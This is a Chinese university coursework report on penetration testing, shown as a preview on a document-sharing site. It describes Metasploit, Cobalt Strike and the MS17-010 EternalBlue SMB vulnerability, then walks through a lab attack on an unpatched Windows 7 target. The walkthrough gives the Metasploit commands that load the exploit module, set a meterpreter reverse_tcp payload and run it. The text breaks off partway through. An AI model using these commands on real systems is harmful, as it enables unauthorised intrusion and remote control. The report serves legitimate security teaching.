渗透测试技术大作业.doc

  1. 1、原创力文档(book118)网站文档一经付费(服务费),不意味着购买了该文档的版权,仅供个人/单位学习、研究之用,不得用于商业用途,未经授权,严禁复制、发行、汇编、翻译或者网络传播等,侵权必究。。
  2. 2、本站所有内容均由合作方或网友上传,本站不对文档的完整性、权威性及其观点立场正确性做任何保证或承诺!文档内容仅供研究参考,付费前请自行鉴别。如您付费,意味着您自己接受本站规则且自行承担风险,本站不退款、不进行额外附加服务;查看《如何避免下载的几个坑》。如果您已付费下载过本站文档,您可以点击 这里二次下载
  3. 3、如文档侵犯商业秘密、侵犯著作权、侵犯人身权等,请点击“版权申诉”(推荐),也可以打举报电话:400-050-0827(电话支持时间:9:00-18:30)。
查看更多
渗透测试技术大作业 课程: 渗透测试技术 目录 TOC \o 1-3 \h \u 29374 一、课程目的 1 31436 二、实验原理 1 15060 三、 实验环境 2 18257 四、实验过程 3 31882 1.搭建windows靶机(开启smb服务) 3 19329 2.在Metasploit中找到MS17-010漏洞渗透攻击模块 3 22186 3.使用扫描模块(scanner) 4 16688 4.使用攻击模块,进行漏洞利用 4 16649 5.设置攻击载荷(默认windows/x64/meterpreter/reverse_tcp) 5 6385 6.安装并配置 Cobalt Strike。 7 PAGE PAGE 1 一、课程目的 通过本课程,掌握渗透测试的流程和方法 二、实验原理 1.Metasploit 简介 (简称:MSF) Metasploit是一款开源安全漏洞检测工具,附带数千个已知的软件漏洞,并保持持续更新。Metasploit高度模块化,即框架由多个module组成,是一款开源安全漏洞利用和测试工具,集成了各种平台上常见的溢出漏洞和流行的shellcode,可以用来信息收集、漏洞探测、漏洞利用等渗透测试的全流程,被安全社区冠以“可以黑掉整个宇宙”之名,并持续保持更新。 2.Cobalt Strike简介(简称CS) Cobalt Strike是一款由java编写的全平台多方协同渗透测试框架,在3.0版本之前它基于Metasploit框架工作,在3.0后的版本以独立成一个渗透测试平台。CobaltStrike集成了端口转发、端口扫描、socket代理、提权、钓鱼、远控木马等功能。该工具几乎覆盖了APT攻击链中所需要用到的各个技术环节,且其最大的优点在于可以进行团队合作和优越的UI界面。 3. MS17-010 永恒之蓝(Eternal Blue)爆发于2017年4月14日晚,是一种利用Windows系统的SMB协议漏洞来获取系统的最高权限,以此来控制被入侵的计算机。甚至于2017年5月12日, 不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,使全世界大范围内遭受了该勒索病毒,甚至波及到学校、大型企业、政府等机构,只能通过支付高额的赎金才能恢复出文件。不过在该病毒出来不久就被微软通过打补丁修复。 永恒之蓝是在Windows的SMB服务处理SMB v1请求时发生的漏洞,这个漏洞导致攻击者在目标系统上可以执行任意代码。通过永恒之蓝漏洞会扫描开放445文件共享端口的Windows机器,无需用户任何操作,只要开机上网,不法分子就能在电脑和服务器中植入勒索软件、远程控制木马、虚拟货币挖矿机等恶意程序 4.smb服务 SMB(全称是Server Message Block)是一个协议服务器信息块,它是一种客户机/服务器、请求/响应协议,通过SMB协议可以在计算机间共享文件、打印机、命名管道等资源,电脑上的网上邻居就是靠SMB实现的;SMB协议工作在应用层和会话层,可以用在TCP/IP协议之上,SMB使用TCP139端口和TCP445端口。 实验环境 攻击机:kali (28) 靶机:windows7 x64 (29)未打永恒之蓝补丁且关闭防火墙. 工具:Metasploit、Cobalt Strike等工具 四、实验过程 1.搭建windows靶机(开启smb服务) 关闭Windows的防火墙,以便对靶机用ms17-010攻击 2.在Metasploit中找到MS17-010漏洞渗透攻击模块 如下图,Metasploit中已有两个MS17-010模块,auxiliary为辅助模块,exploit是攻击模块。 3.使用扫描模块(scanner) 发现上图红框: [+] 和Host is likely VULNERABLE to MS17-010!,证明目标主机存在ms17-010漏洞,可以利用。 4.使用攻击模块,进行漏洞利用 use exploit/windows/smb/ms17_010_eternalblue //使用攻击模块 show options //显示攻击模块的参数 Required栏中选项为yes的说明对应的Current Setting栏需要填写,如RHOSTS set rhost 29 //设置被攻击靶机的ip地址 5.设置攻击载荷(默认windows/x64/meterpreter/reverse_tcp) set payload windows/x64/meterpreter/reverse_tcp 执行攻击 exploit(run) 攻击成功,显示下图 获

文档评论(0)

k12教育文档 + 关注
实名认证
服务提供商

本人专注于k12教育,英语四级考试培训,本人是大学本科计算机专业毕业生,专注软件工程计算机专业,也可承接计算机专业的C语言程序设计,Java开发,Python程序开发。

1亿VIP精品文档

相关文档